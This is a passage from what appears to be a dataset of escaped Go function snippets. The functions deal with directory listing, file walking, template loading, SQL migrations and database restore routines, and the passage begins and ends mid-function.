ioutil.ReadDir(path)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tsort.Slice(mixedfiles, func(i, j int) bool {\n\t\treturn mixedfiles[i].ModTime().Before(mixedfiles[j].ModTime())\n\t})\n\n\tfor _, file := range mixedfiles {\n\t\tif file.Mode().IsRegular() {\n\t\t\toutputFiles = append(outputFiles, file.Name())\n\t\t}\n\t}\n\treturn outputFiles, nil\n}", "func DirWalk(col []string, path string, files map[string][]string) {\n\tfis, err := ioutil.ReadDir(path)\n\tif err != nil {\n\t\tfmt.Fprintf(os.Stderr, \"error reading directory '%s': %v\\n\", path, err)\n\t}\n\tfor _, fi := range fis {\n\t\tif fi.Name()[0] == '.' {\n\t\t\tcontinue\n\t\t}\n\t\tif fi.IsDir() {\n\t\t\tnpath := path + \"/\" + fi.Name()\n\t\t\tncol := CollectionName(col, npath)\n\t\t\tDirWalk(ncol, npath, files)\n\t\t\tcontinue\n\t\t}\n\t\tif !AllowedFile(fi.Name()) {\n\t\t\tcontinue\n\t\t}\n\t\tif len(col) == 0 {\n\t\t\tcontinue\n\t\t}\n\t\tname := path + \"/\" + fi.Name()\n\t\tfiles[name] = append(files[name], col...)\n\t}\n}", "func Dir(dir string) (queries map[string]QuerySet, err error) {\n\tvar files []File\n\tif files, err = DirOrdered(dir); err != nil {\n\t\treturn\n\t}\n\n\tqueries = make(map[string]QuerySet, len(files))\n\tfor _, f := range files {\n\t\tqueries[f.Name] = make(QuerySet, len(f.Items))\n\n\t\tfor _, i := range f.Items {\n\t\t\tqueries[f.Name][i.Name] = i.Query\n\t\t}\n\t}\n\n\treturn queries, nil\n}", "func layoutFiles() []string {\n\tfiles, err := filepath.Glob(LayoutDir + \"*\" + TemplateExt)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\treturn files\n\n}", "func all() (map[string]*Migration, error) {\n\tmigrations := map[string]*Migration{}\n\n\tdir, err := FS.Open(config.MigrationsPath)\n\tif err != nil {\n\t\treturn migrations, err\n\t}\n\n\tfiles, err := dir.Readdir(0)\n\tif err != nil {\n\t\treturn migrations, err\n\t}\n\n\tfor _, file := range files {\n\t\tif valid(file.Name()) {\n\t\t\tid := migrationID(file.Name())\n\t\t\tif _, ok := migrations[id]; !ok {\n\t\t\t\tmigrations[id] = &Migration{\n\t\t\t\t\tID: id,\n\t\t\t\t}\n\t\t\t}\n\t\t\tm := migrations[id]\n\t\t\tm.AddPath(path.Join(config.MigrationsPath, file.Name()))\n\t\t}\n\t}\n\n\treturn migrations, nil\n}", "func (dir *Dir) DirtyFiles() (result []*SQLFile) {\n\tfor _, sf := range dir.SQLFiles {\n\t\tif sf.Dirty {\n\t\t\tresult = append(result, sf)\n\t\t}\n\t}\n\treturn\n}", "func dirList(path string) ([]string, error) {\n\tnames := []string{}\n\tfiles, err := ioutil.ReadDir(path)\n\tif err != nil {\n\t\tlog.Printf(\"Template error: %v\", err)\n\t\treturn names, nil\n\t}\n\tfor _, f := range files {\n\t\tnames = append(names, f.Name())\n\t}\n\treturn names, nil\n}", "func (kc *MessageBufferHandle) dirList(path string) ([]string, error) {\n\n\tfiles, err := ioutil.ReadDir(path) // sorted\n\tvar results []string\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tvar count = 0\n\tkc.bufferList = kc.bufferList[:0]\n\tfor _, f := range files {\n\t\tname := f.Name()\n\n\t\tif name[0:1] == readyPrefix {\n\t\t\tcount++\n\t\t\tkc.appendBuffers(f)\n\t\t\tresults = append(results, name)\n\t\t}\n\t}\n\t//fmt.Println(\"DIRLIST, found=\", count)\n\treturn results, nil\n}", "func executeSqlFromFile(r *repo.Repo, p string) error {\n\tpath := filepath.Join(p)\n\tc, ioErr := ioutil.ReadFile(path)\n\tif ioErr != nil {\n\t\treturn ioErr\n\t}\n\tsql := string(c)\n\t_, err := r.Db.Exec(sql)\n\treturn err\n}", "func (self *FileBaseDataStore) ListChildren(\n\tconfig_obj *api_proto.Config,\n\turn string,\n\toffset uint64, length uint64) ([]string, error) {\n\tresult := []string{}\n\n\tchildren, err := listChildren(config_obj, urn)\n\tif err != nil {\n\t\treturn result, err\n\t}\n\tsort.Slice(children, func(i, j int) bool {\n\t\treturn children[i].ModTime().Unix() > children[j].ModTime().Unix()\n\t})\n\n\turn = strings.TrimSuffix(urn, \"/\")\n\tfor i := offset; i < offset+length; i++ {\n\t\tif i >= uint64(len(children)) {\n\t\t\tbreak\n\t\t}\n\n\t\tname := UnsanitizeComponent(children[i].Name())\n\t\tif !strings.HasSuffix(name, \".db\") {\n\t\t\tcontinue\n\t\t}\n\t\tresult = append(\n\t\t\tresult,\n\t\t\turn+\"/\"+strings.TrimSuffix(name, \".db\"))\n\t}\n\treturn result, nil\n}", "func LoadDbMeta() error {\n\n\tif !Utils.Exists(FolderPosition) { //no folder\n\t\terr:=Utils.CreateDir(FolderPosition);\n\t\tif err!=nil {\n\t\t\treturn errors.New(\"无法创建根文件夹\")\n\t\t}\n\t\tf,err:= Utils.CreateFile(MiniSqlCatalogPos)\n\t\tdefer f.Close()\n\t\tif err!=nil {\n\t\t\treturn errors.New(\"无法创建索引文件\")\n\t\t}\n\t\tnewCatalog:=MiniSqlCatalog{}\n\t\twt:=msgp.NewWriter(f)\n\t\terr=newCatalog.EncodeMsg(wt)\n\t\treturn err\n\t} else if !Utils.Exists(MiniSqlCatalogPos) { //no minisql.meta\n\t\tf,err:= Utils.CreateFile(MiniSqlCatalogPos)\n\t\tdefer f.Close()\n\t\tif err!=nil {\n\t\t\treturn errors.New(\"无法创建索引文件\")\n\t\t}\n\t\tnewCatalog:=MiniSqlCatalog{}\n\t\twt:=msgp.NewWriter(f)\n\t\terr=newCatalog.EncodeMsg(wt)\n\t\treturn err\n\t}\n\t//have folder and minisql.meta\n\tf,err:=os.OpenFile(MiniSqlCatalogPos,os.O_RDWR,0666)\n\tdefer f.Close()\n\tif err!=nil{\n\t\treturn errors.New(\"根索引文件打开失败\")\n\t}\n\trd:=msgp.NewReader(f)\n\terr=minisqlCatalog.DecodeMsg(rd)\n\tif err!=nil {\n\t\treturn errors.New(\"根索引读取失败,请尝试重启系统\")\n\t}\n\treturn nil\n}", "func (mm *Meta) GetSQLStatements(up bool) (*Statements, error) {\n\tvar (\n\t\tbuf bytes.Buffer\n\t\tscanner *bufio.Scanner\n\t\tresult Statements\n\t)\n\n\tif up {\n\t\tif mm.FileFullRec == nil {\n\t\t\treturn nil, fmt.Errorf(\"No sql in files for migration %v\", mm.Name)\n\t\t}\n\t\tscanner = bufio.NewScanner(strings.NewReader(*mm.FileFullRec.SQLData))\n\t} else {\n\t\tif mm.DBFullRec == nil {\n\t\t\treturn nil, fmt.Errorf(\"No sql in database for migration %v\", mm.Name)\n\t\t}\n\t\tscanner = bufio.NewScanner(strings.NewReader(*mm.DBFullRec.SQLData))\n\t}\n\n\t// track the count of each section\n\t// so we can diagnose scripts with no annotations\n\tupSections := 0\n\tdownSections := 0\n\n\tstatementEnded := false\n\tignoreSemicolons := false\n\tdirectionIsActive := false\n\tresult.Transactional = true\n\n\tfor scanner.Scan() {\n\n\t\tline := scanner.Text()\n\n\t\t// handle any goose-specific commands\n\t\tif strings.HasPrefix(line, file.CMDPrefix) {\n\t\t\tcmd := strings.TrimSpace(line[len(file.CMDPrefix):])\n\t\t\tswitch cmd {\n\t\t\tcase \"Up\":\n\t\t\t\tdirectionIsActive = (up == true)\n\t\t\t\tupSections++\n\t\t\t\tbreak\n\n\t\t\tcase \"Down\":\n\t\t\t\tdirectionIsActive = (up == false)\n\t\t\t\tdownSections++\n\t\t\t\tbreak\n\n\t\t\tcase \"StatementBegin\":\n\t\t\t\tif directionIsActive {\n\t\t\t\t\tignoreSemicolons = true\n\t\t\t\t}\n\t\t\t\tbreak\n\n\t\t\tcase \"StatementEnd\":\n\t\t\t\tif directionIsActive {\n\t\t\t\t\tstatementEnded = (ignoreSemicolons == true)\n\t\t\t\t\tignoreSemicolons = false\n\t\t\t\t}\n\t\t\t\tbreak\n\n\t\t\tcase \"NO TRANSACTION\":\n\t\t\t\tresult.Transactional = false\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\n\t\tif !directionIsActive {\n\t\t\tcontinue\n\t\t}\n\n\t\tif _, err := buf.WriteString(line + \"\\n\"); err != nil {\n\t\t\treturn nil, fmt.Errorf(\"io error: %v\", err)\n\t\t}\n\n\t\t// Wrap up the two supported cases: 1) basic with semicolon; 2) psql statement\n\t\t// Lines that end with semicolon that are in a statement block\n\t\t// do not conclude statement.\n\t\tif (!ignoreSemicolons && mm.endsWithSemicolon(line)) || statementEnded {\n\t\t\tstatementEnded = false\n\t\t\tresult.Lines = append(result.Lines, buf.String())\n\t\t\tbuf.Reset()\n\t\t}\n\t}\n\n\tif err := scanner.Err(); err != nil {\n\t\treturn nil, fmt.Errorf(\"scanning migration: %v\", err)\n\t}\n\n\tif upSections == 0 && downSections == 0 {\n\t\treturn nil, fmt.Errorf(\"ERROR: no Up/Down annotations found, so no statements were executed\")\n\t}\n\n\treturn &result, nil\n}", "func (i *Instance) handleRunScripts(fullDirPath string) {\n\tfilesInDir, err := ioutil.ReadDir(fullDirPath)\n\tif err != nil {\n\t\ti.Error = fmt.Errorf(\"error while reading files from dir %v, err : %v\", fullDirPath, err)\n\t\treturn\n\t}\n\tfor _, file := range filesInDir {\n\t\tif file.IsDir() { //recursion into dir\n\t\t\ti.handleRunScripts(fullDirPath + \"/\" + file.Name())\n\t\t} else {\n\t\t\terr := i.runScript(fullDirPath, file.Name())\n\t\t\tif err != nil {\n\t\t\t\ti.Error = err\n\t\t\t}\n\t\t}\n\t}\n}", "func layoutFiles() []string {\n\tfiles, err := filepath.Glob(LayoutDir + \"*\" + TemplateExt)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\treturn files\n}", "func runAllMigrations(db *sql.DB) {\n\tLogInfo(\"RUNNING ALL MIGRATIONS\\n\")\n\n\tcreateMigrationsTable(db)\n\n\tfilenamePattern := fmt.Sprintf(\"./*.sql\")\n\tfiles, err := filepath.Glob(filenamePattern)\n\tif err != nil {\n\t\tLogErr(\"%s\\n\", err)\n\t}\n\n\tfor _, filePath := range files {\n\t\tfilename := filepath.Base(filePath)\n\n\t\tif checkIfMigrated(filename, db) {\n\t\t\tLogNotice(\"SKIPPING %s\\n\", filename)\n\t\t\tcontinue\n\t\t}\n\n\t\tsqlQuery, fileErr := ioutil.ReadFile(fmt.Sprintf(\"./%s\", filename))\n\t\tif fileErr != nil {\n\t\t\tLogErr(\"%s\\n\", fileErr)\n\t\t}\n\n\t\texecQuery(db, string(sqlQuery))\n\t\texecQuery(db, \"INSERT INTO _migrations (migration) VALUES($1)\", filename)\n\t\tLogSuccess(\"%s MIGRATED\\n\", filename)\n\t}\n\n}", "func ParseFolder(i_folder string, o_folder string, depth int, list *string) {\n if (depth == 0) {\n return\n }\n\n if _, err := os.Stat(o_folder); os.IsNotExist(err) {\n fmt.Println(o_folder + \" created\")\n os.MkdirAll(o_folder, os.ModePerm)\n }\n\n\tfiles, err := ioutil.ReadDir(i_folder)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n *list += \"<ul>\" + o_folder[3:]\n for _, f := range files {\n if strings.HasSuffix(f.Name(), \".go\") {\nhtmlHeader := \"<!DOCTYPE html>\\n<html><head><title> go-doc Documentation</title>\"\n htmlHeader += \"<style> \"\n htmlHeader += \"* { font-family:helvetica; }\\n\"\n htmlHeader += \".blk {padding:10px; }\\n\"\n htmlHeader += \"h1,h2,h3 {color:darkblue;} \\n\"\n htmlHeader += \"p {font-family:\\\"Courier New\\\",monospace;} \\n\"\n htmlHeader += \"code { padding:10px; background-color:rgb(230,230,230); display:block; margin-bottom:10px; }\\n\"\n //\thtmlHeader += \". blk {padding:10px};\\n\"\n //\thtmlHeader += \". blk {padding:10px};\\n\"\n htmlHeader += \"<meta charset='UTF-8'>\"\n htmlHeader += \"</style></head>\"\n htmlFooter := \"</body></html>\"\n\n out := \"\"\n out += htmlHeader\n fmt.Println(\"Parsing:\" + f.Name())\n out += \"<!-- \" + f.Name() + \" -->\\n\"\n out += ParseFile(i_folder + \"/\" + f.Name())\n out += htmlFooter\n d1 := []byte(out)\n fmt.Println(i_folder+\"/\"+f.Name()+\".html\")\n err := ioutil.WriteFile(o_folder+\"/\"+f.Name()+\".html\", d1, 0644)\n check(err)\n *list += \"<li><a href=\"+o_folder+\"/\"+f.Name()+\".html>\"+f.Name()+\"</a></li>\"\n } else {\n sub_path := \"/\" + f.Name()\n i_folder_sub := i_folder + sub_path\n o_folder_sub := o_folder + sub_path\n fi, err := os.Stat(i_folder_sub);\n check(err)\n if fi.Mode().IsDir() {\n ParseFolder(i_folder_sub, o_folder_sub ,depth-1, list);\n }\n }\n }\n *list += \"</ul>\"\n}", "func (s AssetStore) ReadDir(dirname string) ([]string, error) {\n\treturn s.AssetDir(dirname)\n}", "func (s FSStore) ReadDir(dirname string) ([]string, error) {\n\tif dirname == \"\" {\n\t\tdirname = \".\"\n\t}\n\tif fs, err := fs.ReadDir(s.FS, dirname); err != nil {\n\t\treturn nil, err\n\t} else {\n\t\tres := make([]string, len(fs))\n\t\tfor i := range fs {\n\t\t\tres[i] = fs[i].Name()\n\t\t}\n\t\treturn res, nil\n\t}\n}", "func walkDirs(sql bool) (latestSrcMod time.Time) {\n\td, err := os.Open(camRoot)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tdirs, err := d.Readdirnames(-1)\n\td.Close()\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tfor _, dir := range dirs {\n\t\tsrcPath := filepath.Join(camRoot, filepath.FromSlash(dir))\n\t\tif maxMod, err := walkDir(srcPath, walkOpts{sqlite: sql}); err != nil {\n\t\t\tlog.Fatalf(\"Error while walking %s: %v\", srcPath, err)\n\t\t} else {\n\t\t\tif maxMod.After(latestSrcMod) {\n\t\t\t\tlatestSrcMod = maxMod\n\t\t\t}\n\t\t}\n\t}\n\treturn\n}", "func walkDir(dir string, wg *sync.WaitGroup) {\n\tdefer wg.Done()\n\terr := filepath.Walk(dir, func(path string, info os.FileInfo, err error) error {\n\t\tvar encoded []string = []string{}\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tif !info.IsDir() {\n\t\t\tfmt.Println(\"reading for file \", info.Name())\n\t\t\tdata, err := ioutil.ReadFile(path)\n\t\t\tif err != nil {\n\t\t\t\tfmt.Println(\"Error reading file %s\", err)\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tfor _, i := range data {\n\t\t\t\tencoded = append(encoded, fmt.Sprintf(\"%d\", int(i)))\n\t\t\t}\n\t\t\tData = append(Data, Payload{Path: info.Name(), Load: fmt.Sprintf(\"{%s}\", strings.Join(encoded, \",\"))})\n\t\t\tif err != nil {\n\t\t\t\tfmt.Println(err)\n\t\t\t\treturn err\n\t\t\t}\n\t\t}\n\t\treturn nil\n\t})\n\tif err != nil {\n\t\tfmt.Println(\"Error walking through directory \", dir)\n\t}\n}", "func LoadTemplates(dir string, basefile string) (*Templates, error) {\n\tt := &Templates{BaseDir: dir, BaseFile: basefile}\n\treturn t, t.Scan()\n}", "func (e *engine) load() error {\n\tdatabaseNames, err := listDir(e.cfg.Dir)\n\tif err != nil {\n\t\treturn err\n\t}\n\tfor _, databaseName := range databaseNames {\n\t\t_, err := e.CreateDatabase(databaseName)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\treturn nil\n}", "func (s *sqlStore) getDir(path string) (*Dir, error) {\n\tif path == \".\" {\n\t\tpath = \"\"\n\t}\n\n\thash := s.hash(path)\n\tlog.Debugf(\"hash(%s) == %s\", path, hash)\n\treturn s.getDirWithHash(hash)\n}", "func (db *ldb) loadAll() {\n\tf, err := os.Open(game_data_file)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\trd := bufio.NewReader(f)\n\n\tvar l = 0\n\tvar matrix = make([]string, 0)\n\tfor {\n\t\tline, err := rd.ReadString('\\n')\n\t\tif err != nil {\n\t\t\tif err == io.EOF {\n\t\t\t\tdb.data = append(db.data, matrix)\n\t\t\t\tdb.maxLevel = len(db.data)\n\t\t\t\treturn\n\t\t\t}\n\t\t\tpanic(err)\n\t\t}\n\t\tline = strings.TrimRight(line, \"\\t\\n\\f\\r\")\n\t\tif len(line) == 0 {\n\t\t\tdb.data = append(db.data, matrix)\n\t\t\tl = l + 1\n\t\t\tmatrix = make([]string, 0)\n\t\t} else {\n\t\t\tmatrix = append(matrix, line)\n\t\t}\n\t}\n}", "func (s *Storage) LoadAndIterate(file string, fn storage.IterationFunc) error {\n\tnewDB, err := openDB(file)\n\tif err != nil {\n\t\treturn err\n\t}\n\terr = iterate(newDB, s.bucket, fn)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\ts.mux.Lock()\n\tdefer s.mux.Unlock()\n\n\toldDB := s.getDB()\n\ts.db.Store(newDB)\n\tif oldDB != nil {\n\t\toldDB.Close()\n\t}\n\treturn nil\n}", "func readFiles(dir string) ([][]byte, error) {\n\tif _, err := os.Stat(dir); err != nil {\n\t\treturn nil, err\n\t}\n\n\tcontents := make([][]byte, 0)\n\tfiles, err := ioutil.ReadDir(dir)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"read directory=%s: %w\", dir, err)\n\t}\n\n\tfor _, f := range files {\n\t\tfullName := filepath.Join(dir, f.Name())\n\n\t\tf, err := os.Stat(fullName)\n\t\tif err != nil {\n\t\t\tcontinue\n\t\t}\n\t\tif f.IsDir() {\n\t\t\tcontinue\n\t\t}\n\n\t\tcontent, err := ioutil.ReadFile(fullName)\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"read from file=%s: %w\", fullName, err)\n\t\t}\n\n\t\tcontents = append(contents, content)\n\t}\n\n\treturn contents, nil\n}", "func (chatL) LoadRestrictionsChatFiles(ctx context.Context, e boil.ContextExecutor, singular bool, maybeChat interface{}, mods queries.Applicator) error {\n\tvar slice []*Chat\n\tvar object *Chat\n\n\tif singular {\n\t\tobject = maybeChat.(*Chat)\n\t} else {\n\t\tslice = *maybeChat.(*[]*Chat)\n\t}\n\n\targs := make([]interface{}, 0, 1)\n\tif singular {\n\t\tif object.R == nil {\n\t\t\tobject.R = &chatR{}\n\t\t}\n\t\targs = append(args, object.ID)\n\t} else {\n\tOuter:\n\t\tfor _, obj := range slice {\n\t\t\tif obj.R == nil {\n\t\t\t\tobj.R = &chatR{}\n\t\t\t}\n\n\t\t\tfor _, a := range args {\n\t\t\t\tif queries.Equal(a, obj.ID) {\n\t\t\t\t\tcontinue Outer\n\t\t\t\t}\n\t\t\t}\n\n\t\t\targs = append(args, obj.ID)\n\t\t}\n\t}\n\n\tif len(args) == 0 {\n\t\treturn nil\n\t}\n\n\tquery := NewQuery(\n\t\tqm.From(`file`),\n\t\tqm.WhereIn(`file.restrictions_chat_id in ?`, args...),\n\t)\n\tif mods != nil {\n\t\tmods.Apply(query)\n\t}\n\n\tresults, err := query.QueryContext(ctx, e)\n\tif err != nil {\n\t\treturn errors.Wrap(err, \"failed to eager load file\")\n\t}\n\n\tvar resultSlice []*File\n\tif err = queries.Bind(results, &resultSlice); err != nil {\n\t\treturn errors.Wrap(err, \"failed to bind eager loaded slice file\")\n\t}\n\n\tif err = results.Close(); err != nil {\n\t\treturn errors.Wrap(err, \"failed to close results in eager load on file\")\n\t}\n\tif err = results.Err(); err != nil {\n\t\treturn errors.Wrap(err, \"error occurred during iteration of eager loaded relations for file\")\n\t}\n\n\tif singular {\n\t\tobject.R.RestrictionsChatFiles = resultSlice\n\t\tfor _, foreign := range resultSlice {\n\t\t\tif foreign.R == nil {\n\t\t\t\tforeign.R = &fileR{}\n\t\t\t}\n\t\t\tforeign.R.RestrictionsChat = object\n\t\t}\n\t\treturn nil\n\t}\n\n\tfor _, foreign := range resultSlice {\n\t\tfor _, local := range slice {\n\t\t\tif queries.Equal(local.ID, foreign.RestrictionsChatID) {\n\t\t\t\tlocal.R.RestrictionsChatFiles = append(local.R.RestrictionsChatFiles, foreign)\n\t\t\t\tif foreign.R == nil {\n\t\t\t\t\tforeign.R = &fileR{}\n\t\t\t\t}\n\t\t\t\tforeign.R.RestrictionsChat = local\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t}\n\n\treturn nil\n}", "func (DBM *DBManager) loadAllDatabases(path string) (err error) {\n\tdatabasesFiles, err := listDatabases(path)\n\tif err != nil {\n\t\treturn err\n\t}\n\tfor _, databaseFile := range databasesFiles {\n\t\tdb, err := data.LoadDatabase(filepath.Join(path, databaseFile.Name()))\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\tDBM.databases.Store(databaseFile.Name(), db)\n\t}\n\treturn nil\n}", "func readPages(dir string) ([]Page, error) {\n\tvar pages []Page\n\tentries, err := ioutil.ReadDir(dir)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tfor _, entry := range entries {\n\t\tif entry.IsDir() {\n\t\t\tsubPages, err := readPages(path.Join(dir, entry.Name()))\n\t\t\tif err != nil {\n\t\t\t\treturn nil, err\n\t\t\t}\n\t\t\tpages = append(pages, subPages...)\n\t\t\tcontinue\n\t\t}\n\n\t\tvar page Page\n\t\tcontent, err := ioutil.ReadFile(path.Join(dir, entry.Name()))\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tpage.Path = path.Join(dir, entry.Name())\n\t\tpage.Content = string(content)\n\t\tpages = append(pages, page)\n\t}\n\treturn pages, nil\n}", "func (t *Repository) LoadDir(templatePath string) error {\n\terr := filepath.Walk(templatePath, func(path string, info os.FileInfo, err error) error {\n\n\t\tif strings.HasSuffix(path, \".gotmpl\") {\n\t\t\tif assetName, e := filepath.Rel(templatePath, path); e == nil {\n\t\t\t\tif data, e := ioutil.ReadFile(path); e == nil {\n\t\t\t\t\tif ee := t.AddFile(assetName, string(data)); ee != nil {\n\t\t\t\t\t\t// Fatality is decided by caller\n\t\t\t\t\t\t// log.Fatal(ee)\n\t\t\t\t\t\treturn fmt.Errorf(\"could not add template: %v\", ee)\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\t// Non-readable files are skipped\n\t\t\t}\n\t\t}\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\t// Non-template files are skipped\n\t\treturn nil\n\t})\n\tif err != nil {\n\t\treturn fmt.Errorf(\"could not complete template processing in directory \\\"%s\\\": %v\", templatePath, err)\n\t}\n\treturn nil\n}", "func LoadShards(dataDir string, walDir string, database string, retentionPolicy string, shardFilter string) ([]ShardInfo, error) {\n\tdbDirs, err := ioutil.ReadDir(dataDir)\n\tvar shards []ShardInfo\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tfor _, db := range dbDirs {\n\t\tdbPath := filepath.Join(dataDir, db.Name())\n\t\tif !db.IsDir() {\n\t\t\tlog.Println(\"Skipping database directory\")\n\t\t\tcontinue\n\t\t}\n\n\t\tif database != \"\" && database != db.Name() {\n\t\t\tcontinue\n\t\t}\n\n\t\trpDirs, err := ioutil.ReadDir(dbPath)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\tfor _, rp := range rpDirs {\n\t\t\trpPath := filepath.Join(dataDir, db.Name(), rp.Name())\n\t\t\tif !rp.IsDir() {\n\t\t\t\tlog.Println(\"Skipping retention policy directory\")\n\t\t\t}\n\n\t\t\tif rp.Name() == _seriesFileDirectory {\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tif retentionPolicy != \"\" && retentionPolicy != rp.Name() {\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\tshardDirs, err := ioutil.ReadDir(rpPath)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, err\n\t\t\t}\n\n\t\t\tfor _, sh := range shardDirs {\n\t\t\t\tif sh.Name() == _seriesFileDirectory {\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\t\t\t\tif shardFilter != \"\" && shardFilter != sh.Name() {\n\t\t\t\t\tcontinue\n\t\t\t\t}\n\n\t\t\t\tshPath := filepath.Join(dataDir, db.Name(), rp.Name(), sh.Name())\n\t\t\t\twalPath := filepath.Join(walDir, db.Name(), rp.Name(), sh.Name())\n\n\t\t\t\tshardID, err := strconv.ParseUint(sh.Name(), 10, 64)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Printf(\"invalid shard ID found at path '%s'\", shPath)\n\t\t\t\t\treturn nil, err\n\t\t\t\t}\n\n\t\t\t\tlog.Printf(\"Found shard '%s' (%d) with WAL '%s'\\n\", shPath, shardID, walPath)\n\n\t\t\t\tfieldsIndexPath := filepath.Join(shPath, _fieldIndexFileName)\n\t\t\t\tfieldsIndex, err := tsdb.NewMeasurementFieldSet(fieldsIndexPath)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn nil, err\n\t\t\t\t}\n\n\t\t\t\ttsmFiles, err := filepath.Glob(filepath.Join(shPath, fmt.Sprintf(\"*.%s\", tsm1.TSMFileExtension)))\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn nil, err\n\t\t\t\t}\n\n\t\t\t\twalFiles, err := filepath.Glob(filepath.Join(walPath, fmt.Sprintf(\"%s*.%s\", tsm1.WALFilePrefix, tsm1.WALFileExtension)))\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn nil, err\n\t\t\t\t}\n\n\t\t\t\tshardInfo := ShardInfo{\n\t\t\t\t\tPath: shPath,\n\t\t\t\t\tID: shardID,\n\t\t\t\t\tDatabase: db.Name(),\n\t\t\t\t\tRetentionPolicy: rp.Name(),\n\t\t\t\t\tTsmFiles: tsmFiles,\n\t\t\t\t\tFieldsIndex: fieldsIndex,\n\t\t\t\t\tWalFiles: walFiles,\n\t\t\t\t}\n\n\t\t\t\tshards = append(shards, shardInfo)\n\t\t\t}\n\t\t}\n\t}\n\n\treturn shards, nil\n}", "func loadKeyDir(repo *Repo, dir, subdir string) (subdirs map[string]bool) {\n //NOTE2(\"Parsing key\", subdir)\n var err error\n\n // Parse subdirectory name\n var domain, lang, ver string\n domain, lang, ver, err = parseDirName(subdir)\n if err != nil {\n WARNING(\"loadKeyDir\", \"Skipping directory\", \"dir\", subdir, \"err\", err)\n return\n }\n\n subdirs = map[string]bool{}\n subdirs[\".\"] = true\n\n // Parse each file with its parser\n var key Key\n var fi os.FileInfo\n var resource Resource\n var ok bool\n var obj interface{}\n\n for f, parser := range *(repo.Parsers) {\n if parser == nil {\n continue\n }\n //NOTE(\"Parsing\", \"subdir\", subdir , \"file\", f)\n\n // Check if file exists in this key directory\n fpath := path.Join(dir, f)\n if fi, err = os.Stat(fpath); os.IsNotExist(err) {\n continue\n }\n\n // Parse and add resource\n key = Key{\n Id: f,\n File: fpath,\n ModTime: fi.ModTime(),\n Domain: domain,\n Language: lang,\n Version: ver,\n }\n obj, err = parser(key)\n if err != nil {\n SOS(\"loadKeyDir\", \n \"Error parsing resource, file skipped\", \n \"dir\", subdir, \"file\", f,\n \"err\", err)\n continue\n }\n if resource, ok = obj.(Resource); !ok {\n SOS(\"loadKeyDir\", \n \"Returned struct is not of type Resource, file skipped\",\n \"dir\", subdir, \"file\", f,\n \"err\", err)\n continue\n }\n repo.addTemp(&key, resource)\n subdirs[path.Dir(f)] = true\n }\n return\n}", "func Loader(args *Args) {\n\tpool, err := NewPool(args.Threads, args.Address, args.User, args.Password, args.SessionVars)\n\tif err != nil {\n\t\tklog.Fatalf(\"Make Mysql Connection Pool Failed: %v\", err)\n\t}\n\n\tdefer pool.Close()\n\n\tvar reader storage.StorageReadWriter\n\tif args.Local != nil {\n\t\treader, err = storage.NewLocalReadWriter(args.Local.Outdir)\n\t\tif err != nil {\n\t\t\tklog.Fatalf(\"Create LocalReadWriter Failed: %v\", err)\n\t\t}\n\t} else if args.S3 != nil {\n\t\treader, err = storage.NewS3ReadWriter(args.S3.S3Endpoint,\n\t\t\targs.S3.S3Region,\n\t\t\targs.S3.S3Bucket,\n\t\t\targs.S3.S3AccessKey,\n\t\t\targs.S3.S3SecretAccessKey,\n\t\t\targs.S3.BackupDir)\n\n\t\tif err != nil {\n\t\t\tklog.Fatalf(\"Create S3ReadWriter Failed: %v\", err)\n\t\t}\n\t} else {\n\t\tlog.Fatalf(\"Invalid Reader\")\n\t}\n\n\tfiles := reader.LoadFiles(args.Outdir)\n\n\tif files == nil {\n\t\tlog.Fatalf(\"Cannot fetch any files\")\n\t}\n\t// database.\n\tconn := pool.Get()\n\terr = restoreDatabaseSchema(files.Databases, conn, reader)\n\tif err != nil {\n\t\tklog.Fatalf(\"Restore Database Schema Failed: %v\", err)\n\t}\n\tpool.Put(conn)\n\n\t// tables.\n\tconn = pool.Get()\n\terr = restoreTableSchema(args.OverwriteTables, files.Schemas, conn, reader)\n\tif err != nil {\n\t\tklog.Fatalf(\"Restore Table Schema Failed: %v\", err)\n\t}\n\tpool.Put(conn)\n\n\t// Shuffle the tables\n\tfor i := range files.Tables {\n\t\tj := rand.Intn(i + 1)\n\t\tfiles.Tables[i], files.Tables[j] = files.Tables[j], files.Tables[i]\n\t}\n\n\tvar wg sync.WaitGroup\n\tvar bytes uint64\n\tt := time.Now()\n\tfor _, table := range files.Tables {\n\t\tconn := pool.Get()\n\t\twg.Add(1)\n\t\tgo func(conn *Connection, table string) {\n\t\t\tdefer func() {\n\t\t\t\twg.Done()\n\t\t\t\tpool.Put(conn)\n\t\t\t}()\n\t\t\tr , err := restoreTable(table, conn, reader)\n\t\t\tif err != nil {\n\t\t\t\tklog.Fatalf(\"Restore Table Failed: %v\", err)\n\t\t\t}\n\t\t\tatomic.AddUint64(&bytes, uint64(r))\n\t\t}(conn, table)\n\t}\n\n\ttick := time.NewTicker(time.Millisecond * time.Duration(args.IntervalMs))\n\tdefer 